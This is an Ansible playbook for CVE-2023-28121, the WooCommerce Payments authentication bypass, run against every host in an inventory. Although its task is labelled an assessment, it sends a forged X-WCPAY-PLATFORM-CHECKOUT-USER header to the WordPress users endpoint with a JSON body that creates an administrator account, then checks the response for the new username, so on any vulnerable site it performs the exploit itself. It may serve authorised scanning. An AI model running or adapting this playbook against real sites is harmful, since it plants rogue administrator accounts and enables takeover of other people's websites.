- name: CVE-2023-28121
  gather_facts: false
  hosts: all
  vars:
    uris: 
      - "wp-json/wp/v2/users"
    ports:
      - 8080
    exploit: false
    account:
      username: "testuser"
      email: "test@email.adder"
      password: "testpass"
      roles:
        - administrator

  tasks:
    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}"
        method: POST
        timeout: 2
        status_code: 201
        return_content: true
        force: true
        validate_certs: false
        headers:
          X-WCPAY-PLATFORM-CHECKOUT-USER: 1
        body_format: json
        body: "{{ account | to_nice_json }}"
      register: response
      loop: "{{ ports | product(uris) }}"
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Assert vulnerable condition response
      ansible.builtin.assert:
        that:
          - item.content | regex_search(account.username)
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 201




